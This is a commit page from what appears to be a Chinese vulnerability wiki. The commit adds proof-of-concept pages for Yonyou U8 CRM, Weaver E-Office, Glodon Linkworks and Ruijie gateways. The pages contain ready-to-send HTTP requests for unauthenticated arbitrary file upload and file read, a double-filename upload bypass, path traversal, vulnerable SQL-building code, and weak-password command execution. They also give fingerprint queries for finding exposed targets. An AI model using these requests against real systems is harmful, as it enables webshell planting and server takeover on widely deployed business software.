漏洞相关:用友,广联达等:tada:

PeiQi0 · Aug 12, 2023 · c7ad269 · c7ad269
1 parent 83c1f26
commit c7ad269
Show file tree

Hide file tree

Showing 27 changed files with 281 additions and 4 deletions.
diff --git a/...press/public/img/1629192036675-609c0b9d-2484-4e61-bb92-da8c1ce0067c-1814947.png b/...press/public/img/1629192036675-609c0b9d-2484-4e61-bb92-da8c1ce0067c-1814947.png
diff --git a/docs/.vuepress/public/img/1678886885513-6b2afaa6-4198-4fc0-9c3d-e7084dcb387a.png b/docs/.vuepress/public/img/1678886885513-6b2afaa6-4198-4fc0-9c3d-e7084dcb387a.png
diff --git a/docs/.vuepress/public/img/1678886936807-eb374d96-c8ca-45d8-a857-2594cfc5c026.png b/docs/.vuepress/public/img/1678886936807-eb374d96-c8ca-45d8-a857-2594cfc5c026.png
diff --git a/...ic/img/1680525831431-a143a41a-f89e-4132-913f-0f0e8858628c-20230812123820985.png b/...ic/img/1680525831431-a143a41a-f89e-4132-913f-0f0e8858628c-20230812123820985.png
diff --git a/docs/.vuepress/public/img/1680525831431-a143a41a-f89e-4132-913f-0f0e8858628c.png b/docs/.vuepress/public/img/1680525831431-a143a41a-f89e-4132-913f-0f0e8858628c.png
diff --git a/docs/.vuepress/public/img/1691568204155-1b46ce98-e317-4318-9fb3-f2bcad3b0988.png b/docs/.vuepress/public/img/1691568204155-1b46ce98-e317-4318-9fb3-f2bcad3b0988.png
diff --git a/docs/.vuepress/public/img/1691569542684-fcd74f60-b580-4ce4-8d2e-a914e213fbd4.png b/docs/.vuepress/public/img/1691569542684-fcd74f60-b580-4ce4-8d2e-a914e213fbd4.png
diff --git a/...ic/img/1691730736125-bbb199fa-01fb-4790-b2a7-d813481d8d88-20230812091116146.png b/...ic/img/1691730736125-bbb199fa-01fb-4790-b2a7-d813481d8d88-20230812091116146.png
diff --git a/docs/.vuepress/public/img/1691733300613-63fefc8c-2e2d-478e-97b8-01ce3f9daf56.png b/docs/.vuepress/public/img/1691733300613-63fefc8c-2e2d-478e-97b8-01ce3f9daf56.png
diff --git a/docs/.vuepress/public/img/1691801728377-50f7e7cb-080f-47fa-9e3d-ad9666fc99c8.png b/docs/.vuepress/public/img/1691801728377-50f7e7cb-080f-47fa-9e3d-ad9666fc99c8.png
diff --git a/docs/.vuepress/public/img/1691802188135-636da27c-837c-432a-88bc-2e215572b2af.png b/docs/.vuepress/public/img/1691802188135-636da27c-837c-432a-88bc-2e215572b2af.png
diff --git a/docs/.vuepress/public/img/1691802569740-77f284a9-b794-4a09-a5fb-1191f5d1ae60.png b/docs/.vuepress/public/img/1691802569740-77f284a9-b794-4a09-a5fb-1191f5d1ae60.png
diff --git a/docs/.vuepress/public/img/1691804423513-f15a6608-1744-47f5-9310-f651ac47a189.png b/docs/.vuepress/public/img/1691804423513-f15a6608-1744-47f5-9310-f651ac47a189.png
diff --git a/docs/.vuepress/public/img/image-20230812085218280.png b/docs/.vuepress/public/img/image-20230812085218280.png
diff --git a/docs/.vuepress/public/img/image-20230812085235711.png b/docs/.vuepress/public/img/image-20230812085235711.png
diff --git a/docs/.vuepress/public/img/image-20230812085349551.png b/docs/.vuepress/public/img/image-20230812085349551.png
diff --git a/docs/dynamic/README.md b/docs/dynamic/README.md
@@ -8,6 +8,17 @@ title: 更新日志
 
 <template>
   <a-timeline>
+    <a-timeline-item>
+      2023.8.12
+      <p>
+         - <a-tag color="red">漏洞相关</a-tag>广联达 Linkworks msgbroadcastuploadfile.aspx 后台文件上传漏洞<br/>
+         - <a-tag color="red">漏洞相关</a-tag>广联达 Linkworks GetIMDictionary SQL注入漏洞<br/>
+         - <a-tag color="red">漏洞相关</a-tag>泛微OA E-Office uploadify 任意文件上传漏洞<br/>
+         - <a-tag color="red">漏洞相关</a-tag>锐捷 BCR商业无线云网关 后台命令执行漏洞<br/>
+         - <a-tag color="red">漏洞相关</a-tag>用友 U8 CRM客户关系管理系统 getemaildata.php 任意文件读取漏洞<br/>
+         - <a-tag color="red">漏洞相关</a-tag>用友 U8 CRM客户关系管理系统 getemaildata.php 任意文件上传漏洞<br/>
+      </p>
+    </a-timeline-item>
     <a-timeline-item>
       2023.8.11
       <p>
@@ -17,7 +28,6 @@ title: 更新日志
          - <a-tag color="red">漏洞相关</a-tag>绿盟 NF下一代防火墙 任意文件上传漏洞<br/>
          - <a-tag color="red">漏洞相关</a-tag>金盘 微信管理平台 getsysteminfo 未授权访问漏洞<br/>
          - <a-tag color="red">漏洞相关</a-tag>1Panel loadfile 后台文件读取漏洞<br/>
-         - <a-tag color="red">漏洞相关</a-tag>广联达 Linkworks GetIMDictionary SQL注入漏洞<br/>
       </p>
     </a-timeline-item>
     <a-timeline-item>

diff --git a/docs/wiki/iot/sidebar_contents.js b/docs/wiki/iot/sidebar_contents.js
@@ -77,7 +77,8 @@ module.exports = [
 			"/wiki/iot/锐捷/锐捷 EG易网关 phpinfo.view.php 信息泄露漏洞",
 			"/wiki/iot/锐捷/锐捷 EG易网关 download.php 任意文件读取漏洞",
 			"/wiki/iot/锐捷/锐捷 EG易网关 cli.php 远程命令执行漏洞",
-			"/wiki/iot/锐捷/锐捷 EG易网关 branch_passw.php 远程命令执行"
+			"/wiki/iot/锐捷/锐捷 EG易网关 branch_passw.php 远程命令执行",
+			"/wiki/iot/锐捷/锐捷 BCR商业无线云网关 后台命令执行漏洞"
 		]
 	},
 	{

diff --git a/docs/wiki/iot/锐捷/锐捷 BCR商业无线云网关后台命令执行漏洞.md b/docs/wiki/iot/锐捷/锐捷 BCR商业无线云网关后台命令执行漏洞.md
@@ -0,0 +1,23 @@
+# 锐捷 BCR商业无线云网关 后台命令执行漏洞
+
+## 漏洞描述
+
+锐捷 BCR商业无线云网关 存在后台命令执行漏洞，攻击者通过默认口令可以登陆后台构造特殊的参数执行任意命令，获取服务器权限
+
+## 漏洞影响
+
+<a-checkbox checked>锐捷 BCR商业无线云网关</a-checkbox></br>
+
+## 网络测绘
+
+<a-checkbox checked>fid="N3IFMflkcmNQ2s4vuAhjzg=="</a-checkbox></br>
+
+## 漏洞复现
+
+登陆页面
+
+![img](../../../.vuepress/public/img/1678886885513-6b2afaa6-4198-4fc0-9c3d-e7084dcb387a.png)
+
+通过弱口令登陆后台 admin 拼接命令
+
+![img](../../../.vuepress/public/img/1678886936807-eb374d96-c8ca-45d8-a857-2594cfc5c026.png)
diff --git a/docs/wiki/oa/sidebar_contents.js b/docs/wiki/oa/sidebar_contents.js
@@ -62,6 +62,9 @@ module.exports = [
 			"/wiki/oa/用友OA/用友 GRP-U8 UploadFileData 任意文件上传漏洞",
 			"/wiki/oa/用友OA/用友 ERP-NC NCFindWeb 目录遍历漏洞",
 			"/wiki/oa/用友OA/用友 移动管理系统 uploadApk.do 任意文件上传漏洞",
+			"/wiki/oa/用友OA/用友 ERP-NC NCFindWeb 目录遍历漏洞",
+			"/wiki/oa/用友OA/用友 U8 CRM客户关系管理系统 getemaildata.php 任意文件读取漏洞",
+			"/wiki/oa/用友OA/用友 U8 CRM客户关系管理系统 getemaildata.php 任意文件上传漏洞",
 		]
 	},
 	{
@@ -89,6 +92,7 @@ module.exports = [
 			"/wiki/oa/泛微OA/泛微OA E-Office UserSelect 未授权访问漏洞",
 			"/wiki/oa/泛微OA/泛微OA E-Office mysql_config.ini 数据库信息泄漏漏洞",
 			"/wiki/oa/泛微OA/泛微OA E-Bridge saveYZJFile 任意文件读取漏洞",
+			"/wiki/oa/泛微OA/泛微OA E-Office uploadify 任意文件上传漏洞",
 		]
 	},
 	{

diff --git a/docs/wiki/oa/泛微OA/泛微OA E-Office uploadify 任意文件上传漏洞.md b/docs/wiki/oa/泛微OA/泛微OA E-Office uploadify 任意文件上传漏洞.md
@@ -0,0 +1,88 @@
+# 泛微OA E-Office uploadify 任意文件上传漏洞
+
+## 漏洞描述
+
+泛微OA E-Office 在 uploadify.php 中上传文件过滤不严格导致允许无限制地上传文件，攻击者可以通过该漏洞直接获取网站权限
+
+## 漏洞影响
+
+<a-checkbox checked>泛微OA E-Office10</a-checkbox></br>
+
+## 网络测绘
+
+<a-checkbox checked>app="泛微-EOffice"</a-checkbox></br>
+
+## 漏洞复现
+
+登录页面
+
+![img](../../../.vuepress/public/img/1629192036675-609c0b9d-2484-4e61-bb92-da8c1ce0067c-1814947.png)
+
+```php
+<?php
+include_once("inc/vulnerability.php");
+if (!empty($_FILES)) {
+    $tempFile = $_FILES['Filedata']['tmp_name'];
+    //获取扩展名
+    if (!strrpos($tempFile, ".")) {
+        echo "";
+        exit;
+    }
+    $fileExt = substr($tempFile, strrpos($tempFile, ".") + 1);
+    $attachmentID = createFileDir();
+    $uploadPath = $_REQUEST["uploadPath"];
+
+    if (trim($uploadPath) == "") {
+        $targetPath = $_SERVER['DOCUMENT_ROOT'] . '/attachment/' . $attachmentID;
+    } else {
+        $targetPath = $uploadPath . '/sent/attachment/' . $attachmentID;
+    }
+
+    if (!file_exists($targetPath)) {
+        mkdir($targetPath, 0777, true);
+    }
+
+    $targetFile = str_replace('//', '/', $targetPath) . "/" . $_FILES['Filedata']['name'];
+    isIllegalUploadFile($targetFile);
+    move_uploaded_file($tempFile, iconv("UTF-8", "GBK", $targetFile));
+    echo $attachmentID;
+}
+
+function createFileDir() {
+    global $ATTACH_PATH;
+    mt_srand((double) microtime() * 1000000);
+    $RADOM_ID = mt_rand() + mt_rand();
+    if (!file_exists($ATTACH_PATH . $RADOM_ID))
+        return $RADOM_ID;
+    else
+        createFileDir();
+}
+
+?>
+```
+
+验证POC
+
+```php
+POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
+Connection: close
+Content-Length: 259
+Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4
+Accept-Encoding: gzip
+
+--e64bdf16c554bbc109cecef6451c26a4
+Content-Disposition: form-data; name="Filedata"; filename="2TrZmO0y0SU34qUcUGHA8EXiDgN.php"
+Content-Type: image/jpeg
+
+<?php echo "2TrZmO0y0SU34qUcUGHA8EXiDgN";unlink(__FILE__);?>
+
+--e64bdf16c554bbc109cecef6451c26a4--
+```
+
+![img](../../../.vuepress/public/img/1691804423513-f15a6608-1744-47f5-9310-f651ac47a189.png)
+
+```php
+/attachment/3466744850/xxx.php
+```
diff --git a/docs/wiki/oa/用友OA/用友 U8 CRM客户关系管理系统 getemaildata.php 任意文件上传漏洞.md b/docs/wiki/oa/用友OA/用友 U8 CRM客户关系管理系统 getemaildata.php 任意文件上传漏洞.md
@@ -0,0 +1,43 @@
+# 用友 U8 CRM客户关系管理系统 getemaildata.php 任意文件上传漏洞
+
+## 漏洞描述
+
+用友 U8 CRM客户关系管理系统 getemaildata.php 文件存在任意文件上传漏洞，攻击者通过漏洞可以获取到服务器权限，攻击服务器
+
+## 漏洞影响
+
+<a-checkbox checked>用友 U8 CRM客户关系管理系统</a-checkbox></br>
+
+## 网络测绘
+
+<a-checkbox checked>web.body="用友U8CRM"</a-checkbox></br>
+
+## 漏洞复现
+
+登陆页面
+
+![img](../../../.vuepress/public/img/1680525831431-a143a41a-f89e-4132-913f-0f0e8858628c.png)
+
+验证POC
+
+```plain
+POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1
+Host:
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykS5RKgl8t3nwInMQ
+
+------WebKitFormBoundarykS5RKgl8t3nwInMQ
+Content-Disposition: form-data; name="file"; filename="test.php "
+Content-Type: text/plain
+
+<?php phpinfo();?>
+
+------WebKitFormBoundarykS5RKgl8t3nwInMQ
+```
+
+![img](../../../.vuepress/public/img/1691569542684-fcd74f60-b580-4ce4-8d2e-a914e213fbd4.png)
+
+文件名需要十六进制减一
+
+```plain
+/tmpfile/updD24D.tmp.php
+```
diff --git a/docs/wiki/oa/用友OA/用友 U8 CRM客户关系管理系统 getemaildata.php 任意文件读取漏洞.md b/docs/wiki/oa/用友OA/用友 U8 CRM客户关系管理系统 getemaildata.php 任意文件读取漏洞.md
@@ -0,0 +1,27 @@
+# 用友 U8 CRM客户关系管理系统 getemaildata.php 任意文件读取漏洞
+
+## 漏洞描述
+
+用友 U8 CRM客户关系管理系统 getemaildata.php 存在任意文件读取漏洞，攻击者通过漏洞可以获取到服务器中的敏感文件
+
+## 漏洞影响
+
+<a-checkbox checked>用友 U8 CRM客户关系管理系统</a-checkbox></br>
+
+## 网络测绘
+
+<a-checkbox checked>web.body="用友U8CRM"</a-checkbox></br>
+
+## 漏洞复现
+
+登陆页面
+
+![img](../../../.vuepress/public/img/1680525831431-a143a41a-f89e-4132-913f-0f0e8858628c-20230812123820985.png)
+
+验证POC
+
+```plain
+/ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini
+```
+
+![img](../../../.vuepress/public/img/1691568204155-1b46ce98-e317-4318-9fb3-f2bcad3b0988.png)
diff --git a/docs/wiki/webapp/sidebar_contents.js b/docs/wiki/webapp/sidebar_contents.js
@@ -235,6 +235,7 @@ module.exports = [
 		collapsable: true,
 		children:[
 			"/wiki/webapp/广联达/广联达 Linkworks GetIMDictionary SQL注入漏洞",
+			"/wiki/webapp/广联达/广联达 Linkworks msgbroadcastuploadfile.aspx 后台文件上传漏洞",
 		]
 	},
 	{

diff --git a/docs/wiki/webapp/广联达/广联达 Linkworks GetIMDictionary SQL注入漏洞.md b/docs/wiki/webapp/广联达/广联达 Linkworks GetIMDictionary SQL注入漏洞.md
@@ -18,6 +18,36 @@
 
 ![img](../../../.vuepress/public/img/1691730736125-bbb199fa-01fb-4790-b2a7-d813481d8d88.png)
 
+```c
+// GTP.IM.Services.Config.WebSite.WebService.IM.Config.ConfigService
+// Token: 0x06000018 RID: 24 RVA: 0x00004148 File Offset: 0x00002348
+[WebMethod(Description = "得到IM系统配置")]
+public string GetIMDictionary(string key)
+{
+	string str = string.Empty;
+	ISysConfigService service = ServiceFactory.GetService<ISysConfigService>();
+	StringBuilder stringBuilder = new StringBuilder();
+	stringBuilder.AppendFormat("select F_VALUE from T_IM_DICTIONARY where f_key='{0}';", key);
+	DataSet dataSet = GSqlDataAccess.SelectDataSet(service.DataSourceName, stringBuilder.ToString(), new DataParameter[0]);
+	if (dataSet != null && dataSet.Tables.Count > 0 && dataSet.Tables[0] != null)
+	{
+		foreach (object obj in dataSet.Tables[0].Rows)
+		{
+			DataRow dataRow = (DataRow)obj;
+			str = dataRow["F_VALUE"].ToString();
+		}
+	}
+	StringBuilder stringBuilder2 = new StringBuilder();
+	stringBuilder2.Append("<?xml version=\"1.0\" encoding=\"utf-8\"?>");
+	stringBuilder2.Append("<result  value=\"" + str + "\" >");
+	stringBuilder2.Append("</result>");
+	return stringBuilder2.ToString();
+}
+
+```
+
+![image.png](../../../.vuepress/public/img/1691802569740-77f284a9-b794-4a09-a5fb-1191f5d1ae60.png)
+
 验证POC
 
 ```php

diff --git a/docs/wiki/webapp/广联达/广联达 Linkworks msgbroadcastuploadfile.aspx 后台文件上传漏洞.md b/docs/wiki/webapp/广联达/广联达 Linkworks msgbroadcastuploadfile.aspx 后台文件上传漏洞.md
@@ -0,0 +1,48 @@
+# 广联达 Linkworks msgbroadcastuploadfile.aspx 后台文件上传漏洞
+
+## 漏洞描述
+
+广联达 Linkworks msgbroadcastuploadfile.aspx 存在后台文件上传漏洞，攻击者通过SQL注入获取管理员信息后，可以登陆发送请求包获取服务器权限
+
+## 漏洞影响
+
+广联达 Linkworks
+
+## 网络测绘
+
+web.body="/Services/Identification/"
+
+## 漏洞复现
+
+登陆页面
+
+![img](../../../.vuepress/public/img/1691730736125-bbb199fa-01fb-4790-b2a7-d813481d8d88-20230812091116146.png)
+
+GTP.IM.Services.Group.WebSite.GTP.IM.Services.Group 存在文件上传，上传后在当前目录 Upload下
+
+![img](../../../.vuepress/public/img/1691801728377-50f7e7cb-080f-47fa-9e3d-ad9666fc99c8.png)
+
+通过SQL注入获取管理员账号密码后登陆后台上传文件,验证POC
+
+```php
+POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1
+Host: 
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
+Cookie: 0_styleName=styleA
+
+------WebKitFormBoundaryFfJZ4PlAZBixjELj
+Content-Disposition: form-data; filename="1.aspx";filename="1.jpg"
+Content-Type: application/text
+
+Test
+
+------WebKitFormBoundaryFfJZ4PlAZBixjELj--
+```
+
+![img](../../../.vuepress/public/img/1691733300613-63fefc8c-2e2d-478e-97b8-01ce3f9daf56.png)
+
+```php
+/GTP/IM/Services/Group/Upload/xxx-xxx-test.aspx
+```
+
+![img](../../../.vuepress/public/img/1691802188135-636da27c-837c-432a-88bc-2e215572b2af.png)
diff --git a/docs/wiki/webapp/绿盟/绿盟 NF下一代防火墙任意文件上传漏洞.md b/docs/wiki/webapp/绿盟/绿盟 NF下一代防火墙任意文件上传漏洞.md
@@ -33,7 +33,7 @@ lang|s:52:"../../../../../../../../../../../../../../../../tmp/";
 --1d52ba2a11ad8a915eddab1a0e85acd9--
 ```
 
-![img](../../../.vuepress/public/img/1684385461375-d54ce083-ef90-4946-b00a-2422bf9169a8.png)
+![image-20230812085235711](../../../.vuepress/public/img/image-20230812085235711.png)
 
 ```python
 POST /api/v1/device/bugsInfo HTTP/1.1
@@ -49,7 +49,9 @@ Content-Disposition: form-data; name="file"; filename="compose.php"
 --4803b59d015026999b45993b1245f0ef--
 ```
 
-![img](../../../.vuepress/public/img/1684385491176-51d6c42a-68bd-4238-9716-b65ff76cd389.png)
+![image-20230812085349551](../../../.vuepress/public/img/image-20230812085349551.png)
+
+
 
 ```python
 POST /api/v1/device/bugsInfo HTTP/1.1